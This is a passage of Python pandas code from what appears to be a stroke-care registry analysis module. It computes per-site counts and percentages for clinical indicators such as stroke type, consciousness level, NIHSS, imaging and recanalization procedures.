self.statsDf['% patients having stroke in the hospital - No'] = self.statsDf.apply(lambda x: round(((x['# patients having stroke in the hospital - No']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
####################
# RECURRENT STROKE #
####################
self.tmp = self.df.groupby(['Protocol ID', 'RECURRENT_STROKE']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="RECURRENT_STROKE", value=-999, new_column_name='tmp')
self.statsDf = self._get_values_for_factors(column_name="RECURRENT_STROKE", value=1, new_column_name='# recurrent stroke - Yes')
self.statsDf['% recurrent stroke - Yes'] = self.statsDf.apply(lambda x: round(((x['# recurrent stroke - Yes']/(x['Total Patients'] - x['tmp'])) * 100), 2) if (x['Total Patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="RECURRENT_STROKE", value=2, new_column_name='# recurrent stroke - No')
self.statsDf['% recurrent stroke - No'] = self.statsDf.apply(lambda x: round(((x['# recurrent stroke - No']/(x['Total Patients'] - x['tmp'])) * 100), 2) if (x['Total Patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf.drop(['tmp'], inplace=True, axis=1)
###################
# DEPARTMENT TYPE #
###################
self.tmp = self.df.groupby(['Protocol ID', 'DEPARTMENT_TYPE']).size().to_frame('count').reset_index()
# Get patients from old version
self.statsDf = self._get_values_for_factors(column_name="DEPARTMENT_TYPE", value=-999, new_column_name='tmp')
self.statsDf = self._get_values_for_factors(column_name="DEPARTMENT_TYPE", value=1, new_column_name='# department type - neurology')
self.statsDf['% department type - neurology'] = self.statsDf.apply(lambda x: round(((x['# department type - neurology']/(x['Total Patients'] - x['tmp'])) * 100), 2) if (x['Total Patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DEPARTMENT_TYPE", value=2, new_column_name='# department type - neurosurgery')
self.statsDf['% department type - neurosurgery'] = self.statsDf.apply(lambda x: round(((x['# department type - neurosurgery']/(x['Total Patients'] - x['tmp'])) * 100), 2) if (x['Total Patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DEPARTMENT_TYPE", value=3, new_column_name='# department type - anesthesiology/resuscitation/critical care')
self.statsDf['% department type - anesthesiology/resuscitation/critical care'] = self.statsDf.apply(lambda x: round(((x['# department type - anesthesiology/resuscitation/critical care']/(x['Total Patients'] - x['tmp'])) * 100), 2) if (x['Total Patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DEPARTMENT_TYPE", value=4, new_column_name='# department type - internal medicine')
self.statsDf['% department type - internal medicine'] = self.statsDf.apply(lambda x: round(((x['# department type - internal medicine']/(x['Total Patients'] - x['tmp'])) * 100), 2) if (x['Total Patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DEPARTMENT_TYPE", value=5, new_column_name='# department type - geriatrics')
self.statsDf['% department type - geriatrics'] = self.statsDf.apply(lambda x: round(((x['# department type - geriatrics']/(x['Total Patients'] - x['tmp'])) * 100), 2) if (x['Total Patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DEPARTMENT_TYPE", value=6, new_column_name='# department type - Other')
self.statsDf['% department type - Other'] = self.statsDf.apply(lambda x: round(((x['# department type - Other']/(x['Total Patients'] - x['tmp'])) * 100), 2) if (x['Total Patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf.drop(['tmp'], inplace=True, axis=1)
###################
# HOSPITALIZED IN #
###################
self.tmp = self.df.groupby(['Protocol ID', 'HOSPITALIZED_IN']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="HOSPITALIZED_IN", value=1, new_column_name='# patients hospitalized in stroke unit / ICU')
self.statsDf['% patients hospitalized in stroke unit / ICU'] = self.statsDf.apply(lambda x: round(((x['# patients hospitalized in stroke unit / ICU']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="HOSPITALIZED_IN", value=2, new_column_name='# patients hospitalized in monitored bed with telemetry')
self.statsDf['% patients hospitalized in monitored bed with telemetry'] = self.statsDf.apply(lambda x: round(((x['# patients hospitalized in monitored bed with telemetry']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="HOSPITALIZED_IN", value=3, new_column_name='# patients hospitalized in standard bed')
self.statsDf['% patients hospitalized in standard bed'] = self.statsDf.apply(lambda x: round(((x['# patients hospitalized in standard bed']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
self.statsDf['# patients hospitalized in stroke unit / ICU or monitored bed'] = self.statsDf['# patients hospitalized in stroke unit / ICU'] + self.statsDf['# patients hospitalized in monitored bed with telemetry']
self.statsDf['% patients hospitalized in stroke unit / ICU or monitored bed'] = self.statsDf.apply(lambda x: round(((x['# patients hospitalized in stroke unit / ICU or monitored bed']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
###############################
# ASSESSED FOR REHABILITATION #
###############################
self.tmp = is_ich_sah_cvt.groupby(['Protocol ID', 'ASSESSED_FOR_REHAB']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="ASSESSED_FOR_REHAB", value=3, new_column_name='# patients assessed for rehabilitation - Not known')
self.statsDf['% patients assessed for rehabilitation - Not known'] = self.statsDf.apply(lambda x: round(((x['# patients assessed for rehabilitation - Not known']/x['is_ich_sah_cvt_patients']) * 100), 2) if x['is_ich_sah_cvt_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ASSESSED_FOR_REHAB", value=1, new_column_name='# patients assessed for rehabilitation - Yes')
self.statsDf['% patients assessed for rehabilitation - Yes'] = self.statsDf.apply(lambda x: round(((x['# patients assessed for rehabilitation - Yes']/(x['is_ich_sah_cvt_patients'] - x['# patients assessed for rehabilitation - Not known'])) * 100), 2) if (x['is_ich_sah_cvt_patients'] - x['# patients assessed for rehabilitation - Not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ASSESSED_FOR_REHAB", value=2, new_column_name='# patients assessed for rehabilitation - No')
self.statsDf['% patients assessed for rehabilitation - No'] = self.statsDf.apply(lambda x: round(((x['# patients assessed for rehabilitation - No']/(x['is_ich_sah_cvt_patients'] - x['# patients assessed for rehabilitation - Not known'])) * 100), 2) if (x['is_ich_sah_cvt_patients'] - x['# patients assessed for rehabilitation - Not known']) > 0 else 0, axis=1)
###############
# STROKE TYPE #
###############
self.tmp = self.df.groupby(['Protocol ID', 'STROKE_TYPE']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="STROKE_TYPE", value=1, new_column_name='# stroke type - ischemic stroke')
self.statsDf['% stroke type - ischemic stroke'] = self.statsDf.apply(lambda x: round(((x['# stroke type - ischemic stroke']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="STROKE_TYPE", value=2, new_column_name='# stroke type - intracerebral hemorrhage')
self.statsDf['% stroke type - intracerebral hemorrhage'] = self.statsDf.apply(lambda x: round(((x['# stroke type - intracerebral hemorrhage']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="STROKE_TYPE", value=3, new_column_name='# stroke type - transient ischemic attack')
self.statsDf['% stroke type - transient ischemic attack'] = self.statsDf.apply(lambda x: round(((x['# stroke type - transient ischemic attack']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="STROKE_TYPE", value=4, new_column_name='# stroke type - subarrachnoid hemorrhage')
self.statsDf['% stroke type - subarrachnoid hemorrhage'] = self.statsDf.apply(lambda x: round(((x['# stroke type - subarrachnoid hemorrhage']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="STROKE_TYPE", value=5, new_column_name='# stroke type - cerebral venous thrombosis')
self.statsDf['% stroke type - cerebral venous thrombosis'] = self.statsDf.apply(lambda x: round(((x['# stroke type - cerebral venous thrombosis']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="STROKE_TYPE", value=6, new_column_name='# stroke type - undetermined stroke')
self.statsDf['% stroke type - undetermined stroke'] = self.statsDf.apply(lambda x: round(((x['# stroke type - undetermined stroke']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
#######################
# CONSCIOUSNESS LEVEL #
#######################
self.tmp = is_ich_sah_cvt.groupby(['Protocol ID', 'CONSCIOUSNESS_LEVEL']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="CONSCIOUSNESS_LEVEL", value=5, new_column_name='# level of consciousness - not known')
self.statsDf['% level of consciousness - not known'] = self.statsDf.apply(lambda x: round(((x['# level of consciousness - not known']/x['is_ich_sah_cvt_patients']) * 100), 2) if x['is_ich_sah_cvt_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CONSCIOUSNESS_LEVEL", value=1, new_column_name='# level of consciousness - alert')
self.statsDf['% level of consciousness - alert'] = self.statsDf.apply(lambda x: round(((x['# level of consciousness - alert']/(x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known'])) * 100), 2) if (x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CONSCIOUSNESS_LEVEL", value=2, new_column_name='# level of consciousness - drowsy')
self.statsDf['% level of consciousness - drowsy'] = self.statsDf.apply(lambda x: round(((x['# level of consciousness - drowsy']/(x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known'])) * 100), 2) if (x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CONSCIOUSNESS_LEVEL", value=3, new_column_name='# level of consciousness - comatose')
self.statsDf['% level of consciousness - comatose'] = self.statsDf.apply(lambda x: round(((x['# level of consciousness - comatose']/(x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known'])) * 100), 2) if (x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CONSCIOUSNESS_LEVEL", value=4, new_column_name='# level of consciousness - GCS')
self.statsDf['% level of consciousness - GCS'] = self.statsDf.apply(lambda x: round(((x['# level of consciousness - GCS']/(x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known'])) * 100), 2) if (x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known']) > 0 else 0, axis=1)
#######
# GCS #
#######
# Get temporary dataframe with the level of consciousness - GCS
gcs = is_ich_sah_cvt[is_ich_sah_cvt['CONSCIOUSNESS_LEVEL'].isin([4])].copy()
# Calculate total number of patients with GCS level of consciousness per site
self.statsDf['gcs_patients'] = self._count_patients(dataframe=gcs)
self.tmp = gcs.groupby(['Protocol ID', 'GCS']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="GCS", value=1, new_column_name='# GCS - 15-13')
self.statsDf['% GCS - 15-13'] = self.statsDf.apply(lambda x: round(((x['# GCS - 15-13']/x['gcs_patients']) * 100), 2) if x['gcs_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="GCS", value=2, new_column_name='# GCS - 12-8')
self.statsDf['% GCS - 12-8'] = self.statsDf.apply(lambda x: round(((x['# GCS - 12-8']/x['gcs_patients']) * 100), 2) if x['gcs_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="GCS", value=3, new_column_name='# GCS - <8')
self.statsDf['% GCS - <8'] = self.statsDf.apply(lambda x: round(((x['# GCS - <8']/x['gcs_patients']) * 100), 2) if x['gcs_patients'] > 0 else 0, axis=1)
self.statsDf.drop(['gcs_patients'], inplace=True, axis=1)
# GCS is mapped to the consciousness level. GCS 15-13 is mapped to alert, GCS 12-8 to drowsy and GCS < 8 to comatose
self.statsDf['alert_all'] = self.statsDf['# level of consciousness - alert'] + self.statsDf['# GCS - 15-13']
self.statsDf['alert_all_perc'] = self.statsDf.apply(lambda x: round(((x['alert_all']/(x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known'])) * 100), 2) if (x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known']) > 0 else 0, axis=1)
self.statsDf['drowsy_all'] = self.statsDf['# level of consciousness - drowsy'] + self.statsDf['# GCS - 12-8']
self.statsDf['drowsy_all_perc'] = self.statsDf.apply(lambda x: round(((x['drowsy_all']/(x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known'])) * 100), 2) if (x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known']) > 0 else 0, axis=1)
self.statsDf['comatose_all'] = self.statsDf['# level of consciousness - comatose'] + self.statsDf['# GCS - <8']
self.statsDf['comatose_all_perc'] = self.statsDf.apply(lambda x: round(((x['comatose_all']/(x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known'])) * 100), 2) if (x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known']) > 0 else 0, axis=1)
del gcs
#########
# NIHSS #
#########
# Seperate calculation for CZ
if country_code == 'CZ':
self.tmp = is_ich.groupby(['Protocol ID', 'NIHSS']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="NIHSS", value=1, new_column_name='# NIHSS - Not performed')
self.statsDf['% NIHSS - Not performed'] = self.statsDf.apply(lambda x: round(((x['# NIHSS - Not performed']/x['is_ich_patients']) * 100), 2) if x['is_ich_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="NIHSS", value=2, new_column_name='# NIHSS - Performed')
self.statsDf['% NIHSS - Performed'] = self.statsDf.apply(lambda x: round(((x['# NIHSS - Performed']/x['is_ich_patients']) * 100), 2) if x['is_ich_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="NIHSS", value=3, new_column_name='# NIHSS - Not known')
self.statsDf['% NIHSS - Not known'] = self.statsDf.apply(lambda x: round(((x['# NIHSS - Not known']/x['is_ich_patients']) * 100), 2) if x['is_ich_patients'] > 0 else 0, axis=1)
# Create temporary dataframe with patient who had performed NIHSS (NIHSS = 2)
nihss = is_ich[is_ich['NIHSS'].isin([2])]
tmpDf = nihss.groupby(['Protocol ID']).NIHSS_SCORE.agg(['median']).rename(columns={'median': 'NIHSS median score'})
factorDf = self.statsDf.merge(tmpDf, how='outer', left_on='Protocol ID', right_on='Protocol ID')
factorDf.fillna(0, inplace=True)
self.statsDf['NIHSS median score'] = factorDf['NIHSS median score']
del nihss
else:
self.tmp = is_ich_cvt.groupby(['Protocol ID', 'NIHSS']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="NIHSS", value=1, new_column_name='# NIHSS - Not performed')
self.statsDf['% NIHSS - Not performed'] = self.statsDf.apply(lambda x: round(((x['# NIHSS - Not performed']/x['is_ich_cvt_patients']) * 100), 2) if x['is_ich_cvt_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="NIHSS", value=2, new_column_name='# NIHSS - Performed')
self.statsDf['% NIHSS - Performed'] = self.statsDf.apply(lambda x: round(((x['# NIHSS - Performed']/x['is_ich_cvt_patients']) * 100), 2) if x['is_ich_cvt_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="NIHSS", value=3, new_column_name='# NIHSS - Not known')
self.statsDf['% NIHSS - Not known'] = self.statsDf.apply(lambda x: round(((x['# NIHSS - Not known']/x['is_ich_cvt_patients']) * 100), 2) if x['is_ich_cvt_patients'] > 0 else 0, axis=1)
# Create temporary dataframe with patient who had performed NIHSS (NIHSS = 2)
nihss = is_ich_cvt[is_ich_cvt['NIHSS'].isin([2])]
tmpDf = nihss.groupby(['Protocol ID']).NIHSS_SCORE.agg(['median']).rename(columns={'median': 'NIHSS median score'})
factorDf = self.statsDf.merge(tmpDf, how='outer', left_on='Protocol ID', right_on='Protocol ID')
factorDf.fillna(0, inplace=True)
self.statsDf['NIHSS median score'] = factorDf['NIHSS median score']
del nihss
##########
# CT/MRI #
##########
is_ich_tia_cvt_not_referred = is_ich_tia_cvt.loc[~(is_ich_tia_cvt['STROKE_TYPE'].isin([1]) & is_ich_tia_cvt['RECANALIZATION_PROCEDURES'].isin([5,6,7,8]))].copy()
self.statsDf['is_ich_tia_cvt_not_referred_patients'] = self._count_patients(dataframe=is_ich_tia_cvt_not_referred)
self.tmp = is_ich_tia_cvt_not_referred.groupby(['Protocol ID', 'CT_MRI']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="CT_MRI", value=1, new_column_name='# CT/MRI - Not performed')
self.statsDf['% CT/MRI - Not performed'] = self.statsDf.apply(lambda x: round(((x['# CT/MRI - Not performed']/x['is_ich_tia_cvt_not_referred_patients']) * 100), 2) if x['is_ich_tia_cvt_not_referred_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CT_MRI", value=2, new_column_name='# CT/MRI - performed')
self.statsDf['% CT/MRI - performed'] = self.statsDf.apply(lambda x: round(((x['# CT/MRI - performed']/x['is_ich_tia_cvt_not_referred_patients']) * 100), 2) if x['is_ich_tia_cvt_not_referred_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CT_MRI", value=3, new_column_name='# CT/MRI - Not known')
self.statsDf['% CT/MRI - Not known'] = self.statsDf.apply(lambda x: round(((x['# CT/MRI - Not known']/x['is_ich_tia_cvt_not_referred_patients']) * 100), 2) if x['is_ich_tia_cvt_not_referred_patients'] > 0 else 0, axis=1)
# Create temporary dataframe with patients who had performed CT/MRI (CT_MRI = 2)
ct_mri = is_ich_tia_cvt_not_referred[is_ich_tia_cvt_not_referred['CT_MRI'].isin([2])]
ct_mri['CT_TIME'] = pd.to_numeric(ct_mri['CT_TIME'])
self.tmp = ct_mri.groupby(['Protocol ID', 'CT_TIME']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="CT_TIME", value=1, new_column_name='# CT/MRI - Performed within 1 hour after admission')
self.statsDf['% CT/MRI - Performed within 1 hour after admission'] = self.statsDf.apply(lambda x: round(((x['# CT/MRI - Performed within 1 hour after admission']/x['# CT/MRI - performed']) * 100), 2) if x['# CT/MRI - performed'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CT_TIME", value=2, new_column_name='# CT/MRI - Performed later than 1 hour after admission')
self.statsDf['% CT/MRI - Performed later than 1 hour after admission'] = self.statsDf.apply(lambda x: round(((x['# CT/MRI - Performed later than 1 hour after admission']/x['# CT/MRI - performed']) * 100), 2) if x['# CT/MRI - performed'] > 0 else 0, axis=1)
self.statsDf.drop(['is_ich_tia_cvt_not_referred_patients'], inplace=True, axis=1)
del ct_mri, is_ich_tia_cvt_not_referred
####################
# VASCULAR IMAGING #
####################
self.tmp = ich_sah.groupby(['Protocol ID', 'CTA_MRA_DSA']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors_more_values(column_name="CTA_MRA_DSA", value={'1', '1,2', '1,3'}, new_column_name='# vascular imaging - CTA')
self.statsDf['% vascular imaging - CTA'] = self.statsDf.apply(lambda x: round(((x['# vascular imaging - CTA']/x['ich_sah_patients']) * 100), 2) if x['ich_sah_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_more_values(column_name="CTA_MRA_DSA", value={'2', '1,2', '2,3'}, new_column_name='# vascular imaging - MRA')
self.statsDf['% vascular imaging - MRA'] = self.statsDf.apply(lambda x: round(((x['# vascular imaging - MRA']/x['ich_sah_patients']) * 100), 2) if x['ich_sah_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_more_values(column_name="CTA_MRA_DSA", value={'3', '1,3', '2,3'}, new_column_name='# vascular imaging - DSA')
self.statsDf['% vascular imaging - DSA'] = self.statsDf.apply(lambda x: round(((x['# vascular imaging - DSA']/x['ich_sah_patients']) * 100), 2) if x['ich_sah_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_more_values(column_name="CTA_MRA_DSA", value={'4'}, new_column_name='# vascular imaging - None')
self.statsDf['% vascular imaging - None'] = self.statsDf.apply(lambda x: round(((x['# vascular imaging - None']/x['ich_sah_patients']) * 100), 2) if x['ich_sah_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_more_values(column_name="CTA_MRA_DSA", value={'1,2', '1,3', '2,3'}, new_column_name='# vascular imaging - two modalities')
self.statsDf['% vascular imaging - two modalities'] = self.statsDf.apply(lambda x: round(((x['# vascular imaging - two modalities']/x['ich_sah_patients']) * 100), 2) if x['ich_sah_patients'] > 0 else 0, axis=1)
### DATA NORMLAIZATION
norm_tmp = self.statsDf[['% vascular imaging - CTA', '% vascular imaging - MRA', '% vascular imaging - DSA', '% vascular imaging - None']].copy()
norm_tmp.loc[:,'rowsums'] = norm_tmp.sum(axis=1)
self.statsDf['vascular_imaging_cta_norm'] = ((norm_tmp['% vascular imaging - CTA']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['vascular_imaging_mra_norm'] = ((norm_tmp['% vascular imaging - MRA']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['vascular_imaging_dsa_norm'] = ((norm_tmp['% vascular imaging - DSA']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['vascular_imaging_none_norm'] = ((norm_tmp['% vascular imaging - None']/norm_tmp['rowsums']) * 100).round(decimals=2)
del norm_tmp
##############
# VENTILATOR #
##############
# Seperate calculation for CZ (difference in the stroke types)
if country_code == 'CZ':
self.tmp = is_ich.groupby(['Protocol ID', 'VENTILATOR']).size().to_frame('count').reset_index()
# Get number of patients from the old version
self.statsDf = self._get_values_for_factors(column_name="VENTILATOR", value=-999, new_column_name='tmp')
self.statsDf = self._get_values_for_factors(column_name="VENTILATOR", value=3, new_column_name='# patients put on ventilator - Not known')
self.statsDf['% patients put on ventilator - Not known'] = self.statsDf.apply(lambda x: round(((x['# patients put on ventilator - Not known']/(x['is_ich_patients'] - x['tmp'])) * 100), 2) if (x['is_ich_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="VENTILATOR", value=1, new_column_name='# patients put on ventilator - Yes')
self.statsDf['% patients put on ventilator - Yes'] = self.statsDf.apply(lambda x: round(((x['# patients put on ventilator - Yes']/(x['is_ich_patients'] - x['tmp'] - x['# patients put on ventilator - Not known'])) * 100), 2) if (x['is_ich_patients'] - x['tmp'] - x['# patients put on ventilator - Not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="VENTILATOR", value=2, new_column_name='# patients put on ventilator - No')
self.statsDf['% patients put on ventilator - No'] = self.statsDf.apply(lambda x: round(((x['# patients put on ventilator - No']/(x['is_ich_patients'] - x['tmp'] - x['# patients put on ventilator - Not known'])) * 100), 2) if (x['is_ich_patients'] - x['tmp'] - x['# patients put on ventilator - Not known']) > 0 else 0, axis=1)
self.statsDf.drop(['tmp'], inplace=True, axis=1)
else:
self.tmp = is_ich_cvt.groupby(['Protocol ID', 'VENTILATOR']).size().to_frame('count').reset_index()
# Get number of patients from the old version
self.statsDf = self._get_values_for_factors(column_name="VENTILATOR", value=-999, new_column_name='tmp')
self.statsDf = self._get_values_for_factors(column_name="VENTILATOR", value=3, new_column_name='# patients put on ventilator - Not known')
self.statsDf['% patients put on ventilator - Not known'] = self.statsDf.apply(lambda x: round(((x['# patients put on ventilator - Not known']/(x['is_ich_cvt_patients'] - x['tmp'])) * 100), 2) if (x['is_ich_cvt_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="VENTILATOR", value=1, new_column_name='# patients put on ventilator - Yes')
self.statsDf['% patients put on ventilator - Yes'] = self.statsDf.apply(lambda x: round(((x['# patients put on ventilator - Yes']/(x['is_ich_cvt_patients'] - x['tmp'] - x['# patients put on ventilator - Not known'])) * 100), 2) if (x['is_ich_cvt_patients'] - x['tmp'] - x['# patients put on ventilator - Not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="VENTILATOR", value=2, new_column_name='# patients put on ventilator - No')
self.statsDf['% patients put on ventilator - No'] = self.statsDf.apply(lambda x: round(((x['# patients put on ventilator - No']/(x['is_ich_cvt_patients'] - x['tmp'] - x['# patients put on ventilator - Not known'])) * 100), 2) if (x['is_ich_cvt_patients'] - x['tmp'] - x['# patients put on ventilator - Not known']) > 0 else 0, axis=1)
self.statsDf.drop(['tmp'], inplace=True, axis=1)
#############################
# RECANALIZATION PROCEDURES #
#############################
self.tmp = isch.groupby(['Protocol ID', 'RECANALIZATION_PROCEDURES']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="RECANALIZATION_PROCEDURES", value=1, new_column_name='# recanalization procedures - Not done')
self.statsDf['% recanalization procedures - Not done'] = self.statsDf.apply(lambda x: round(((x['# recanalization procedures - Not done']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="RECANALIZATION_PROCEDURES", value=2, new_column_name='# recanalization procedures - IV tPa')
self.statsDf['% recanalization procedures - IV tPa'] = self.statsDf.apply(lambda x: round(((x['# recanalization procedures - IV tPa']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="RECANALIZATION_PROCEDURES", value=3, new_column_name='# recanalization procedures - IV tPa + endovascular treatment')
self.statsDf['% recanalization procedures - IV tPa + endovascular treatment'] = self.statsDf.apply(lambda x: round(((x['# recanalization procedures - IV tPa + endovascular treatment']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="RECANALIZATION_PROCEDURES", value=4, new_column_name='# recanalization procedures - Endovascular treatment alone')
self.statsDf['% recanalization procedures - Endovascular treatment alone'] = self.statsDf.apply(lambda x: round(((x['# recanalization procedures - Endovascular treatment alone']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="RECANALIZATION_PROCEDURES", value=5, new_column_name='# recanalization procedures - IV tPa + referred to another centre for endovascular treatment')
self.statsDf['% recanalization procedures - IV tPa + referred to another centre for endovascular treatment'] = self.statsDf.apply(lambda x: round(((x['# recanalization procedures - IV tPa + referred to another centre for endovascular treatment']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="RECANALIZATION_PROCEDURES", value=6, new_column_name='# recanalization procedures - Referred to another centre for endovascular treatment')
self.statsDf['% recanalization procedures - Referred to another centre for endovascular treatment'] = self.statsDf.apply(lambda x: round(((x['# recanalization procedures - Referred to another centre for endovascular treatment']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="RECANALIZATION_PROCEDURES", value=7, new_column_name='# recanalization procedures - Referred to another centre for endovascular treatment and hospitalization continues at the referred to centre')
self.statsDf['% recanalization procedures - Referred to another centre for endovascular treatment and hospitalization continues at the referred to centre'] = self.statsDf.apply(lambda x: round(((x['# recanalization procedures - Referred to another centre for endovascular treatment and hospitalization continues at the referred to centre']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="RECANALIZATION_PROCEDURES", value=8, new_column_name='# recanalization procedures - Referred for endovascular treatment and patient is returned to the initial centre')
self.statsDf['% recanalization procedures - Referred for endovascular treatment and patient is returned to the initial centre'] = self.statsDf.apply(lambda x: round(((x['# recanalization procedures - Referred for endovascular treatment and patient is returned to the initial centre']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="RECANALIZATION_PROCEDURES", value=9, new_column_name='# recanalization procedures - Returned to the initial centre after recanalization procedures were performed at another centre')
self.statsDf['% recanalization procedures - Returned to the initial centre after recanalization procedures were performed at another centre'] = self.statsDf.apply(lambda x: round(((x['# recanalization procedures - Returned to the initial centre after recanalization procedures were performed at another centre']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
# tag::recanalized_patients[]
recanalized_df = isch.loc[isch['IVT_DONE'].isin([1]) | isch['TBY_DONE'].isin([1])]
self.statsDf['# patients recanalized'] = self._count_patients(dataframe=recanalized_df)
recanalized_denominator_df = isch.loc[isch['IVT_DONE'].isin([1]) | isch['TBY_DONE'].isin([1]) | isch['RECANALIZATION_PROCEDURES'].isin([1])]
self.statsDf['denominator'] =self._count_patients(dataframe=recanalized_denominator_df)
self.statsDf['% patients recanalized'] = self.statsDf.apply(lambda x: round(((x['# patients recanalized']/x['denominator']) * 100), 2) if x['denominator'] > 0 else 0, axis=1)
self.statsDf.drop(['denominator'], inplace=True, axis=1)
del recanalized_df
# end::recanalized_patients[]
"""
# Get recanalization procedure differently for CZ, they are taking the possible values differently
if country_code == 'CZ':
# self.statsDf['# patients recanalized'] = self.statsDf.apply(lambda x: x['# recanalization procedures - IV tPa'] + x['# recanalization procedures - IV tPa + endovascular treatment'] + x['# recanalization procedures - IV tPa + referred to another centre for endovascular treatment'] + x['# recanalization procedures - Endovascular treatment alone'] + x['# recanalization procedures - Referred to another centre for endovascular treatment and hospitalization continues at the referred to centre'] + x['# recanalization procedures - Referred for endovascular treatment and patient is returned to the initial centre'], axis=1)
